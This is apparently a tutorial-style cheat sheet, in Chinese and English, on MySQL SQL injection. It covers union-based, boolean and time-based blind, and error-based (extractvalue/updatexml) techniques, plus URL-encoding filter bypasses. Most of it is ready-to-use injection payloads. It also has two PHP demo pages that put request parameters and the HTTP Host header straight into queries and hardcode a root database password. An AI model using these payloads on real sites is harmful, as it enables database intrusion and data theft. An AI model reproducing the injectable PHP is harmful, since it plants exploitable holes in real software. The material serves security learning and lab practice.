0x00 mysql base
注释符:( /!/可执行 )
逻辑运算符
- and/&&(%26%26)
- or/||(%7C%7C)
- not/!
connect function
| function |
effect |
| concat($str,$str) |
连接字符串 |
| concat_ws(,$str,$str) |
以指定的分隔符连接字符串 |
| group_concat($set) |
返回多个字符串组成的一个集合 |
0x01 union select
order by /:排序字段(超出列数会报错)union :合并俩个查询的结果集(需列数相同)
<?php
$user='root';
$passwd='243285';
$host='127.0.0.1';
$db='zzy';
//$sql="insert into tb_conurses() values('1','1','1','1');";
function connect(){
global $user,$passwd,$host,$db;
$con=mysqli_connect($host,$user,$passwd,$db);
return $con;
}
$id=$_GET['id'];
$select="select id,name from classes where id='$id';";
$info=mysqli_query(connect(),$select);
$result=mysqli_fetch_row($info);
foreach($result as $value){
echo $value;
}
?>
<url>?id=1' union select 1,2 %23
0x02 blind injection
mysql> select user_name from test like 'r_%';
mysql> select user_name from test regexp '^[0-9]$';
based on bool
| function |
effect |
| left($str,a) |
从左截取a位 |
| length($str) |
返回字符串长度 |
| substr($str,a,b) |
从第a位截取b位 |
| ascil($str) |
返回字符串ascii码 |
mysql> select * from test where id =1 and/or substr(user(),1,1)='r';
<url>?id=1' and substr(database(),1,1) like 's%' --+
based on time
| function |
effect |
| if($condition,true,false) |
判断条件 |
| sleep($num) |
延时函数 |
mysql> select * from test where id =1 and/or if(substr(user())='r',1,sleep(5);
<url>?id=1' and if(substr(database(),1,1) like 's%',1,sleep(5)) --+
0x03 Error injection
这是一个比较特殊的注入方式,上面俩种方式只能用于select语句,而error注入可以用在很多语句里,如insert,delete,update语句,从而出现了http header注入,cookie注入…
| function |
effect |
| floor(num) |
向下取整 |
| extractvalue(xml_document,xml_path) |
查看xml |
| updatexml( xml_document,xml_path,xml_update) |
更新xml |
mysql> insert into test() values(1,2,3) and/or extractvalue(1,concat(0x7e,(<sql>)));
mysql> insert into test() values(1,2,3) and/or updatexml(1,concat(0x7e,(<sql>)),1);
<?php
$user='root';
$passwd='243285';
$host='127.0.0.1';
$db='zzy';
function connect(){
global $user,$passwd,$host,$db;
$con=mysqli_connect($host,$user,$passwd,$db);
return $con;
}
//插入数据
$host=$_SERVER['HTTP_HOST'];
$ip=$_SERVER['REMOTE_ADDR'];
$insert="insert into http_header(host,ip) values('$host','$ip');";
if(!$_GET['id']){
mysqli_query(connect(),$insert);}
//查找数据
$select='select * from http_header';
$data=mysqli_fetch_assoc(mysqli_query(connect(),$select));
echo "<a href='./connect_mysql.php'>你的ip是:{$data['host']}</a>";
//删除数据 <url>?id=1' updatexml(1,concat(0x7e,user()),1) or '
$id=$data['id'];
$delete_sql="delete from http_header where id=$id;";
echo "<p><a href=./connect_mysql.php?id=$id>删除</a></p>";
$delete=$_GET['id'];
if (isset($delete) and is_numeric($delete)){
$data2=mysqli_query(connect(),$delete_sql);
if ($data2){
echo '删除成功';
}
}
?>
0x04 Bypass
| url_code |
effect |
| %09 |
水平制表符 |
| %0a |
换行符 |
| %0b |
垂直制表符 |
| %0c |
换页键 |
| %0d |
回车符 |
| %20 |
空格,不同于+ |
| %22 |
" |
| %23 |
# |
| %27 |
' |
| %2a |
* |
| %2d |
- |
| %2f |
/ |
| %5c |
\ |
| %a0 |
space |
